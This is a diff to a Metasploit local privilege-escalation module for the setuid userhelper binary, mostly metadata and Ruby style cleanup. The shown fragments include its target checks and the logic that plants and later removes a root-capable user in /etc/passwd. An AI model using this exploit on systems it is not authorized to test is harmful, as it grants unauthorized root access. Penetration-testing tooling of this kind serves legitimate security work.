@@ -69,20 +69,23 @@ class MetasploitModule < Msf::Exploit::Local
           [ 'URL', 'https://access.redhat.com/articles/1537873' ]
         ],
         'DefaultTarget' => 0,
-        'Notes' => {
-          'AKA' => ['roothelper.c']
-        },
         'Compat' => {
           'Meterpreter' => {
             'Commands' => %w[
               stdapi_sys_process_execute
             ]
           }
+        },
+        'Notes' => {
+          'AKA' => ['roothelper.c'],
+          'Stability' => [SERVICE_RESOURCE_LOSS],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [ARTIFACTS_ON_DISK]
         }
       )
     )
     register_options [
-      OptEnum.new('COMPILE', [ true, 'Compile on target', 'Auto', %w(Auto True False) ]),
+      OptEnum.new('COMPILE', [ true, 'Compile on target', 'Auto', %w[Auto True False] ]),
       OptString.new('PASSWORD', [ true, 'Password for the current user', '' ])
     ]
     register_advanced_options [
@@ -129,14 +132,13 @@ class MetasploitModule < Msf::Exploit::Local
 
   def check
     userhelper_path = '/usr/sbin/userhelper'
-    unless setuid? userhelper_path
-      vprint_error "#{userhelper_path} is not setuid"
-      return CheckCode::Safe
-    end
+    return CheckCode::Safe("#{userhelper_path} file not found") unless file? userhelper_path
+    return CheckCode::Safe("#{userhelper_path} is not setuid") unless setuid? userhelper_path
+
     vprint_good "#{userhelper_path} is setuid"
 
     unless command_exists? 'script'
-      vprint_error "script is not installed. Exploitation will fail."
+      vprint_error 'script is not installed. Exploitation will fail.'
       return CheckCode::Safe
     end
     vprint_good 'script is installed'
@@ -148,7 +150,7 @@ class MetasploitModule < Msf::Exploit::Local
     vprint_good 'File /etc/passwd is not immutable'
 
     glibc_banner = cmd_exec 'ldd --version'
-    glibc_version = Rex::Version.new glibc_banner.scan(/^ldd\s+\(.*\)\s+([\d\.]+)/).flatten.first
+    glibc_version = Rex::Version.new glibc_banner.scan(/^ldd\s+\(.*\)\s+([\d.]+)/).flatten.first
     if glibc_version.to_s.eql? ''
       vprint_error 'Could not determine the GNU C library version'
       return CheckCode::Detected
@@ -165,10 +167,8 @@ class MetasploitModule < Msf::Exploit::Local
   end
 
   def exploit
-    if is_root?
-      unless datastore['ForceExploit']
-        fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'
-      end
+    if !datastore['ForceExploit'] && is_root?
+      fail_with(Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.')
     end
 
     unless writable? base_dir
@@ -216,7 +216,7 @@ class MetasploitModule < Msf::Exploit::Local
     output.each_line { |line| vprint_status line.chomp }
 
     if output =~ %r{Creating a backup copy of "/etc/passwd" named "(.*)"}
-      register_file_for_cleanup $1
+      register_file_for_cleanup ::Regexp.last_match(1)
     end
 
     if output =~ /died in parent: .*.c:517: forkstop_userhelper/
@@ -226,7 +226,7 @@ class MetasploitModule < Msf::Exploit::Local
     @username = nil
 
     if output =~ /Exploit successful, run "su ([a-z])" to become root/
-      @username = $1
+      @username = ::Regexp.last_match(1)
     end
 
     if @username.blank?
@@ -279,7 +279,7 @@ class MetasploitModule < Msf::Exploit::Local
     unless new_user_removed
       print_warning "Could not remove user '#{@username}' from /etc/passwd"
     end
-  rescue => e
+  rescue StandardError => e
     print_error "Error during cleanup: #{e.message}"
   ensure
     super
